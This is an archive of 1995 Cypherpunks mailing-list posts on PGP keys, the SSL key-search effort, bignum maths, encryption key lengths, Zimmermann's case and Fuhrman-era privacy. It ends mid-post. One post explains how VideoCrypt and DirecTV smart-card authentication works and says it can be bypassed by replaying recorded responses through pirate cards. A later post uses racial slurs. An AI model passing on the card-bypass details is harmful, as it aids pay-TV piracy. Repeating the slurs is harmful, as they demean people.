NKGW33EeplPEg2Rpv/pxWYqNICfYQa6j9xAUVPSPZbJD9HrWM+sJ7uJGuLMY0p48
4u/vppPSyHU=
=bvnM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Thu, 31 Aug 95 23:14:44 PDT
To: cypherpunks@toad.com
Subject: Hmmm.. (fwd)
Message-ID: <199509010555.AAA20955@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


In a previous message, Jamie Rishaw said...

This was from one of the discussion groups concerning InterNIC's operation
of the whois services, registration services, etc.  I found it quite
interesting that they were logging this sort of information.

Bryan

> From owner-rs-talk@internic.net  Fri Sep  1 00:47:14 1995
> Message-Id: <m0soE5J-001dv0C@sauron.multiverse.com>
> From: jamie@sauron.multiverse.com (Jamie Rishaw)
> Subject: Hmmm..
> To: rs-talk@internic.net
> Date: Thu, 31 Aug 1995 14:11:28 -0400 (EDT)
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> Content-Length:        343
> Sender: owner-rs-talk@internic.net
> 
> What's this?
> 
> melkor% whois seaway.com                                                  ~/nic
> crt0: no /usr/lib/ld.so
>  
> Could not open log file [/home/guest/guest/logs/whoisrv.log]
> 
> 
> Does NIC log all the WHOIS requests?  Why?
> 
> 
> -- 
> jamie rishaw (jamie@multiverse.net)
> 
> "Hey!  Who took the cork off my lunch??!"
>                 -- W. C. Fields
> 


-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 31 Aug 95 21:58:14 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <v02130506ac6c253a5e59@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:50 8/30/95, MONTY HARDER wrote:
>I recommend that anyone who will be using escrowed keys generate two
>pairs: First, the signature key, including in the userid some kind of
>[sig use] identifier (we should settle on a standard abbreviation for
>this) follower by the encryption key. This way, when a person gets your
>pubkeys, they get the encryption key =last=, which gets it searched
>first whenever they PGP -e... something.
>
>  Whatever arrangements are made for escrowing my encryption key,
>=nobody= gets my signature key. If I am fired, quit, become brain
>damaged or dead, my key can never be used by anyone to implicate me in
>any criminal activity.
>
>
>
>  Please don't mention to anyone the fact that my signature key can be
>used to send me something that even the escrow agents can't read....

I do not think that PGP 2.x can easily (ie: Automatically) use one key for
Signing and another for Encrypting a Message (it does both at the same time
if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
the result but I'm not sure if doing the decrypt on such a message will
automatically spot the signature and verify it (as would occur with a E+S
pass).

PGP3 is supposed to have the ability to have keysets that contain two keys
for this purpose (ie: When you generate a key set you can ask it to
generate separate Sign and Encrypt keys so that separate keys get used for
each function).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 31 Aug 95 21:58:44 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL search attack
Message-ID: <v02130508ac6c2efca958@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 8/31/95, Piete Brooks wrote:
> I am against pre-fetching of the next chunk, as I believe it should not be
>        necessary (I'll review that after Hal3) and it tends to increase NOACKs

I see nothing wrong with the concept of being allocated an initial chunk
and having the scan software attempt to ACK it when 50% of it has been
searched. A successful ACK would allow the releasing of a new chunk (in
response) equal in size to the returned chunk. A failure of the Server to
accept the ACK would trigger a retry at set intervals (such as 75% and 100%
or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
in possession of a Full Sized Chuck to scan (so long as the Server accepts
an ACK before the 100% done mark) and temporary failures will not stop the
process of a scanner as currently happens.

Note: All this does is alter the size of the initial chunk granted and
allow the scanner to report partial progress and reset the scanned range
back to the original chunk size (ie: The Scanner never has more than the
designated assigned chunk size at any time - it just gets refreshed in
pieces [thus allowing overlap of scanning with getting a new range to scan]
in lieu of all at once [which has a failure to accept the ACK as a bottle
neck in uninterrupted scanning]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 31 Aug 95 23:17:08 PDT
To: perry@piermont.com
Subject: Re: sums with BIG numbers
In-Reply-To: <199509010555.BAA25418@frankenstein.piermont.com>
Message-ID: <199509010620.BAA00211@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> Sherry Mayo writes:
> > Can anyone point me to any books, documentation or
> > whatever that will explain the methods used in routines
> > like bignum for doing sums with 'too-big' numbers.
> > 
> > I'm having a tough time trying to figure it out from the code 
> > ;-(
> 
> The best book to read is, of course, Volume 2 of Knuth's "Art of
> Computer Programming". Many of the algorithms in use today are a bit
> snazzier but Knuth explains all the general principles of how such
> things are done.
> 
> BTW, any good hacker should own all three published volumes. Its *the*
> classic.
> 
> Perry
> 

Volume 4 should be in print shortly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kooltek@iol.ie (jmcc)
Date: Thu, 31 Aug 95 17:34:35 PDT
To: cypherpunks@toad.com
Subject: Re: Fiat Shamir Zero Knowledge Test
Message-ID: <199509010028.BAA06686@joyce.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>Can someon point me to a net description of
>the "Fiat Shamir Zero Knowledge Test" used
>in the RCA DirecTV smart cards.
>

The standard text on this is the paper "How To Prove Yourself" by Fiat and
Shamir. I'll try and dig up the name of the ftp site I found it on but in
the meantime here is a rough description.

The access control system for RCA DirecTv was developed by News Datacom.
They, News Datacom, also developed the security for the VideoCrypt system
here in Europe. The smart card used in VideoCrypt here in Europe has been
continually reverse-engineered for the last three card issues. (currently on
issue 09). Therefore much of the description below is based on the European
system. Of course the fact that the DSS cards are now turning up in Europe
repainted as Sky cards indicates that the ROM is identical. This is where
the routined for card i/o protocols and data packets are. As a result, the
DirecTv system probably uses the same packet types. Any of the pirate smart
card emulator programs available on BBSes on FTP sites can be used to
monitor the data flowing to and from the card. Cutting to the chase:

Packet - Direction- Bytes - Function
70       C > D      6       Card presents  6 byte ID number to decoder
7C       C > D     16       Card sends tiering/authorisation levels to decoder
7E	 C > D     64       Card sends X value for ZKT to decoder 
80       D > C	    1       Decoder sends Q flag to card (either 00h or 01h)
82       C > D     64       Card's Y ZKT response to decoder
70       C > D      6       Card presents 6 byte ID number to decoder


The Fiat Shamir ZKT as used in here is dependent on a number of elements:
S, the serial number of the card. 
N, the common modulus. 
R, the look-up table in the card (a block of data).
X, the value sent by the card to be authenticated.
Q, the calculation mode flag (either 00h or 01h)
Y, the calculated response from the card.

The X value is calculated as X=R^2 mod N. The Y responses are calculated as
follows.

 Y = R if Q=00h
 Y = (R * S) mod N if Q=01h

The Q flag tells the card how to generate response Y. The card would be
authenticated in the following cases:

If Q=00h then Y^2 = X mod N

If Q=01h then Y^2 = (X * V) mod N where V is the card identity number
received prior to the authentication process. S, the card serial number is
derived from V by the equation: S = sqrt (V) mod N

The implementation of the ZKT in VideoCrypt is faulty and open to a simple
hack. It is designed to make the card authenticate itself. Many of the
earlier decoders had a flaw in the ZKT calculation routines in the decoder.
Of course the data in the decoder was easily popped by hackers since the
microcontroller in charge of the authentication was not secured.

In the VideoCrypt system, one of the latest bypasses for the ZKT is to
record the response from a valid card and have the pirate card replay it.
This saves a lot of time and it does work perfectly.

Since the complete contents, (ROM and EEPROM), of the VideoCrypt card are
now available, the whole idea of authentication is invalid. In the DSS
system, however, there the ZKT is still viable though there are some ways in
which it theoretically could  be bypassed if it uses the same implementation
as VideoCrypt.

Regards...jmcc
(John McCormac)
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAYiFIAAAEEANTTBXIijEE82VN6nL7U+Or0Br4/eJ6POKxfxy64GOJsEO7g
kPrAI3zzuYZ4XhOH01Lt4dtr+0hmanMpKOssYR02sZGaR6OARWSRe9KIWpSUGHG3
8pBBCqYO6adzFEVEOclqDQ1L6QZaOsf+qX8h9eo/bXpeYg43PZvSRmmL6lExAAUR
tA5rb29sdGVrQGlvbC5pZQ==
=vzc/
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 22:56:24 PDT
To: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010555.BAA25418@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sherry Mayo writes:
> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.
> 
> I'm having a tough time trying to figure it out from the code 
> ;-(

The best book to read is, of course, Volume 2 of Knuth's "Art of
Computer Programming". Many of the algorithms in use today are a bit
snazzier but Knuth explains all the general principles of how such
things are done.

BTW, any good hacker should own all three published volumes. Its *the*
classic.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:14:48 PDT
To: cypherpunks@toad.com
Subject: FUHRMAN key escrow
Message-ID: <199509011002.FAA28046@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                   FUHRMAN key escrow

   Fuhrman seems to be a Godsend to us. He is helping to destroy the
public's perceived legitimacy of state authority. If things keep moving
the way they are, Fuhrman may join the names: John Crapper, Quisling,
& Hooker. In which case, I propose the term, Fuhrman key escrow, to
substitue for the term, mandatory state key escrow.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:17:18 PDT
To: cypherpunks@toad.com
Subject: Phil Zimmermann/Amnesty International?
Message-ID: <199509011005.FAA28054@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


         Phil Zimmermann/Amnesty International?

   I was wondering if the Zimmermann case would be a proper concern of
Amnesty International. Phil is obviously a political dissident. His
persecution is obviously political. If Phil got support from Amnesty
Int'l, then his persecution could be a big embarrassment to the Federal
gov't. He has a lot of supporters and taking up his cause could be a
big promotional for Amnesty International. The Feds might feel forced
to drop the matter early. Any ideas?

                                             Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 1 Sep 95 06:00:13 PDT
To: cypherpunks@toad.com
Subject: Web of Trust
Message-ID: <199509011201.GAA01376@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am current sorting through the PGP keyserver keyfile to extract a
limited web of trust. I believe that current servers would be best to
limit their keys in a similar fashon. Since we can't all have what we want
without coding it ourselves, I'm doing the next best crappy imitation.
Anyways, I am trying to find keys that are actually relevant and
inter-connected with signatures. Naturally, it won't be anywhere near
complete or extensive, and will be a dog to update, but 5 meg keyfiles
take a long time to search... 

I am requesting that all "active" cypherpunks/cyphergroupies please send me
their key number, IF it's already on the keyservers. If it's recently put
there, be sure to tell me or I will be annoyed. If it's not there at all,
I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If
you searched any of the RC4 or SSL keyspace, for example, I'm interested.
If you post messages occasionally, [conspiracypunks need not apply] I'm
interested. If you generated a key because your neighbor taught you how,
don't bother. 

If anyone wants the keynumbers/script/entirekeyfile I could put it on
ftp or something. Naturally, I'll be forwarding all results to the NSA 
quantum crack-o-matic. Have a nice day. :)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEb1A8La+QKZS485AQGMKwL/Qzf67QSnn3iLZ7gCumfPcC/KqSyYSM0s
OknMHhGDLb74qSWBDRyM6pPdwIHOg+Pjpl53ruMSu9YhXQrjMHgZZUjFh6c7vhi2
c+j3BYQ87us0BRuoj9pu8/d89gG3vsv3
=3qRz
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Sep 95 04:09:58 PDT
To: ravage@einstein.ssz.com
Subject: Re: sums with BIG numbers
Message-ID: <9509011109.AA15900@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Volume 4 should be in print shortly.
All of Volume 4 or the first couple-hundred pages as a fascile?
Or have those plans change?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gjeffers@socketis.net)
Date: Wed, 20 Sep 95 17:17:36 PDT
To: cypherpunks@toad.com
Subject: PHIL ZIMMERMANN/AMNESTY INTERNATIONAL?
Message-ID: <9509201546525457@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 01 Sep 1995 02:16:20 -0500
To: cypherpunks@toad.com
From: gjeffers@socketis.net (Gary Jeffers)
Subject: Phil Zimmermann/Amnesty International?

         Phil Zimmermann/Amnesty International?

   I was wondering if the Zimmermann case would be a proper concern of
Amnesty International. Phil is obviously a political dissident. His
persecution is obviously political. If Phil got support from Amnesty
Int'l, then his persecution could be a big embarrassment to the Federal
gov't. He has a lot of supporters and taking up his cause could be a
big promotional for Amnesty International. The Feds might feel forced
to drop the matter early. Any ideas?

                                             Gary Jeffers
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 05:27:47 PDT
To: hal9001@panix.com
Subject: Re: SSL search attack
Message-ID: <9509011225.AA20540@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk. A failure of the Server to
> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> in possession of a Full Sized Chuck to scan (so long as the Server accepts
> an ACK before the 100% done mark) and temporary failures will not stop the
> process of a scanner as currently happens.
> 

The only way this can work is if the server is told it is a 50%/75%/etc
size ACK, and then latter the server is ACKed for the full 100%. 

Why?  Because what happens if the client dies immediately after doing 
the ACK - maybe only 51% of that space has been searched, yet 
the server has already seen an ACK for it.


IMO - a % ACK is to much complexity and extra work on the server,
which is already having trouble keeping up.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 1 Sep 95 04:39:57 PDT
To: starrd@iia2.org (starrd)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <Pine.BSD.3.91.950831174002.16046A-100000@usr1.primenet.com>
Message-ID: <95Sep1.073743edt.1421@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I am a user of SecureDrive, and strongly support it.   There is *no* 
> interface required, once you log into the drive, *everything* operates 
> totally transparent to the user.
I used to use it too.  Sure, once you've got it set up and automated,
it's transparent.  But can you see J. Random User installing it?

> Always keep in mind that when the gov't doesn't mind the software being 
> exported, they alrady know how to compromise it...Trust PGP, Hpack & 
> SecureDrive...you won't be disappointed.
When last I looked, your government didn't allow the export of 80-bit
cryptosystems.  There is no argument that the 40-bit export version
is breakable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Fri, 1 Sep 95 06:13:28 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
Message-ID: <v02130500ac6cb126c323@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
>>
>> I see nothing wrong with the concept of being allocated an initial chunk
>> and having the scan software attempt to ACK it when 50% of it has been
>> searched. A successful ACK would allow the releasing of a new chunk (in
>> response) equal in size to the returned chunk. A failure of the Server to
>> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
>> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
>> in possession of a Full Sized Chuck to scan (so long as the Server accepts
>> an ACK before the 100% done mark) and temporary failures will not stop the
>> process of a scanner as currently happens.
>>
>
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then latter the server is ACKed for the full 100%.
>
>Why?  Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.

You NEVER claim to have searched space until you have actually done so.

>IMO - a % ACK is to much complexity and extra work on the server,
>which is already having trouble keeping up.
No. The claim is that the server has no problem keeping up with acks.
Besides, if it does, we simply insert a layer of "managers" to buffer the
top management from being "bothered" too often.

You are making the "ACK" too complicated.
Assuming that you are multi-threaded--- Simply run two "workers" on the
same machine. If there are delays in getting keys assigned, the two will
soon get out of phase and keep the cpu busy.

----
Richard Wackerbarth
rkw@dataplex.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 06:27:10 PDT
To: rkw@dataplex.net
Subject: Re: SSL search attack
Message-ID: <9509011325.AA20856@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
> >>
> >> I see nothing wrong with the concept of being allocated an initial chunk
> >> and having the scan software attempt to ACK it when 50% of it has been
> >> searched. A successful ACK would allow the releasing of a new chunk (in
> >> response) equal in size to the returned chunk. A failure of the Server to
> >> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> >> in possession of a Full Sized Chuck to scan (so long as the Server accepts
> >> an ACK before the 100% done mark) and temporary failures will not stop the
> >> process of a scanner as currently happens.
> >>
> >
> >The only way this can work is if the server is told it is a 50%/75%/etc
> >size ACK, and then latter the server is ACKed for the full 100%.
> >
> >Why?  Because what happens if the client dies immediately after doing
> >the ACK - maybe only 51% of that space has been searched, yet
> >the server has already seen an ACK for it.
> 
> You NEVER claim to have searched space until you have actually done so.

That is exactly what I was arguing against - but the first sentance of what
I quoted was saying was ok.


> Assuming that you are multi-threaded--- Simply run two "workers" on the
> same machine. If there are delays in getting keys assigned, the two will
> soon get out of phase and keep the cpu busy.
> 

I kind of like that idea...

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 10:12:16 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509011708.KAA11228@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner's example has fairly close analogies today.
Corporations, cash, and assets with variable value are already useful.

Alice is the dying parent who runs a business or has a good credit-rating.
Bob is the irresponsible kid, Carol is the about-to-be unlucky creditor.
Alice borrows lots of money from Carol, tells Bob that it's in the
mattress / numbered Swiss Bank Account / collection of $$$$ artwork at home.
Alice dies, and Bob absconds with the money (probate isn't needed for
Swiss bank accounts or unrecorded stuff in mattresses) or sells the paintings
to the highest bidder of Dave, Eve, and Freddie (with a bribe to all of them,
and a kickback from Dave when he finally sells the painting for its real value.)
(Or maybe it's not bribery and kickbacks, he's just a major shareholder
in the Glorkspitz corporation, which is a major shareholder in their
businesses.)

Carol is stuck trying to get money out of The Alice Estate, which turns
out to be surprisingly broke.  If she lent the money to The Alice Company
(which looks more creditworthy than Chronologically Challenged Widow Alice),
Alice would have had to leave Bob the yellow-sticky with the store safe
combination
instead of leaving the cash in her mattress.

Now, one reason we have probate courts is to try to stop this sort of fraud,
making sure creditors get paid and heirs get their shares.  Another reason,
of course, is to make sure "Uncle" Sammy gets to inherit part of it,
even though he's not a relative.  (That's of course one of the reasons for
having Swiss bank accounts you didn't remember to mention on your tax forms,
fireproof mattresses, foreign corporations, and friends in the art dealer
business :-)

Does good anonymity make this easier?  Sure.  And if all the heirs are
cooperative,
they can conspire to rip off their parents' creditors, if they're dishonest,
or at least to avoid taxes, if they're not tax-believers.  Of course, if they're
dishonest, they'll have plenty of opportunities without having anybody die,
and that'll probably affect bankruptcy law and increase Federal
self-justification
for watching the money supply long before anonymous estate ripoffs become
common.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 10:12:06 PDT
To: cypherpunks@toad.com
Subject: Re: opinions on RSA Secure?
Message-ID: <199509011708.KAA11239@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> The fact that the key is only 80 is *major* compromise.  I would 
>> recommend that package to no-one.   With only a 80 bit key you dont 
>> *need* trapdoors, granted they may be more "convenient" but the fact is 
>> the 80 key *can* [and certainly will] be broken...

80 is an interesting number.  Clipper-sized :-)  It's much less than 128,
which seems to be popular for other software and works well with MD5-based
random session key generators.  It's also interestingly bigger than 64,
which the Feds are trying to tell us is good enough for non-government work.
Are RSA giving in to the Feds?  Or are they trying to up the bid, at least 
allowing us something as good as Clipper if we can't get 128?  Not my poker
game.

Let's look at some threat models.
It's probably more than strong enough for any data you're willing to keep
on a machine running MS-DOS, where serious attackers will go around it;
it's about right for random "left your laptop in the airport" security,
and for business use, if the police are going to confiscate your machine,
they can probably subpoena the keys from somebody in your company anyway.
Random hackers aren't going to be able to crack it, unlike 40-48 or maybe 56.

It's big enough that the NSA probably can't break it right now,
but in 10-20 years of computer speed growth they'll be able to if they want.
It's probably fine for dealing with amounts less than $1-100M for maybe 10
years,
and for misdemeanors and light felonies if you're not using the key escrow :-)
And in 5 years, you'll be using a different operating system (even if it _is_
named "Windows"), so you'll need a new version, and you can re-encrypt your data
when you move it to a decent-sized disk instead of that wimpy 9GB mechanical
drive.
Anybody who's got a 5-year-old dump of your system has probably stolen any
secrets you care about long since anyway.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Fri, 1 Sep 95 07:12:13 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509011005.FAA28054@mail.socketis.net>
Message-ID: <199509011410.KAA20234@libws1.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    I was wondering if the Zimmermann case would be a proper concern of
> Amnesty International. Phil is obviously a political dissident. His
> persecution is obviously political. If Phil got support from Amnesty
> Int'l, then his persecution could be a big embarrassment to the Federal
> gov't. He has a lot of supporters and taking up his cause could be a
> big promotional for Amnesty International. The Feds might feel forced
> to drop the matter early. Any ideas?
> 
I've heard that A.I. does not discuss political persecution as much in
the countries that are doing it, since they do not want to offend the
powers-that-be in that country, though they will note a case in another
country.  (In other words, if A.I. did note the PRZ case they'd only
discuss it outside the United States.)

This is just speculation though...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Fri, 1 Sep 95 07:12:28 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID: <199509011412.KAA20264@libws1.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


>                    FUHRMAN key escrow
> 
>    Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitue for the term, mandatory state key escrow.

I think that the revelations of police corruption in Philadelphia
(where police have admitted to setting-up hundreds of people) may have
more effect that Fuhrman...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Sep 95 07:52:59 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears...
In-Reply-To: <v02130506ac6c253a5e59@[166.84.254.3]>
Message-ID: <9509011452.AA15088@l-slide.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I do not think that PGP 2.x can easily (ie: Automatically) use one key for
> Signing and another for Encrypting a Message (it does both at the same time
> if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
> the result but I'm not sure if doing the decrypt on such a message will
> automatically spot the signature and verify it (as would occur with a E+S
> pass).

Sure it can, and I know people who do.  Here is what you do:

1) Generate two keys.  First generate your encryption key, then
generate your signature key.  This way, your signature key will be
placed first in your secret keyring, and it will be used by default.
Alternatively, you could use two (slightly) different userIDs on the
keys and put something in your config.txt

2) Extract the keys in reverse order into a single keyfile and then
distribute that keyfile to people.  This way, when it gets added to
other people's keyrings, the encryption key will be placed first, and
that will be used by default.

3) Proceed to use PGP normally.  When you sign a message, it will find
the signature key first and use that.  When someone wants to encrypt
to you, they will find the encryption key first.  When verifying the
signature or trying to decrypt the message, it uses the keyID to
determine which key was used, so order does not matter.

The only problem is that if someone re-orders their keyring then this
will no longer work.  E.g., if the keys are added in the wrong order.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "rudy (r.) rawlins" <rudy@bnr.ca>
Date: Fri, 1 Sep 95 10:32:48 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
Message-ID: <"8983 Fri Sep  1 11:17:28 1995"@bnr.ca>
MIME-Version: 1.0
Content-Type: text/plain


In message "Phil Zimmermann/Amnesty International?", rrothenb@ic.sunysb.edu writes:

> > 
> >    I was wondering if the Zimmermann case would be a proper concern of
> > Amnesty International. [snip]
> > 
> I've heard that A.I. does not discuss political persecution as much in
> the countries that are doing it, since they do not want to offend the
> powers-that-be in that country, though they will note a case in another
> country.  (In other words, if A.I. did note the PRZ case they'd only
> discuss it outside the United States.)
> 
> This is just speculation though...
> 

You're right on the speculation; A.I. has no such policy. As a matter of 
fact, they will meet face to face with government officials to seek the
release of 'prisoners of conscious' - which is a possible category for
Phil Z. Though Phil, despite what we may think, is not a prisoner, yet.. 

                                      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 11:13:21 PDT
To: cypherpunks@toad.com
Subject: Fuhrman needed a digital pseudonym!
Message-ID: <ac6c95850302100486b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Before you folks jump on the "racist" Mark Fuhrman, think about the
"surveillance state" issues. While it was not any government organization
that taped Fuhrman's comments, there are some real issues involved in how
deeply and how far back we want to "mine" comments made by people. Some
real issues of privacy.

The Mark Fuhrmans of the future may be interested in using technologies to
protect their privacy, to give them "plausible deniability" should their
recorded words come back to haunt them.

Brief comments:

* This post is primarily about the role of pseudonyms, not the OJ trial or
the testimony/tapes involving Mark Fuhrman.

* And the issue of "mining" of ancient records, especially as technology
makes the recording of sounds, the taping of sights, and the archiving of
electronic messages so much easier.

* Those who think this is off-topic because it has nothing to do with
coding in C are hereby invited to hit the "D" key, or whatever passes for
it, right now.


Caveat: I've watched entirely too much of the OJ trial on CNN, as I sit
here at home and surf the Net every morning. It's easy to have the
television on, and the OJ trial has had many interesting twists. When the
stuff gets boring, I switch to music or perhaps to the financial network
CNBC. So, I've see nearly everything being talked about here.

Opinion on OJ: ***elided by Tim to head off debates about OJ's guilt or
innoncence***.

(I state this to show my prejudices, not to start an "OJ debate" on this
list. Actually, I just elided (deleted) the opinion I had expressed, so as
not to inflame anyone here.)

What really bothers me, as it relates to the pro-privacy themes of this
list, is the reaching back many years to comments made by a witness--Mark
Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10
years, these comments may likely strongly influence the verdict in this
"trial of the century."

Anyone in favor of heading off the "surveillance society" should be alarmed
at this development. As tape recorders and video cameras proliferate,
comments may be compiled, taken out of context, and used as evidence.

(Who amongst us has not said "nigger"? Does it count if I am asking why the
rap group "Niggas with Attitude" chooses to label themselves as niggers? I
figure that if blacks routinely call themselves niggers and call folks like
me "honkies," then it's fair to call _them_ niggers. Not that I do this,
but I don't see the term as so horrifying as to cause a killer like OJ to
get off as this spectacle unfolds. Besides, it's become "permissable" for
black leaders to refer to New York City as "Hymietown" in a way that would
result in public stoning for a white to refer to a city as "Niggertown."
The old double standard.)

The point: Fuhrman should have used a pseudonym, should have taken steps to
protect his identity. Of course, in 1985 this would have been harder.

But have people given up the right to speak "for themselves" in private? If
there is no solid evidence that Fuhrman actually committed any crimes, but
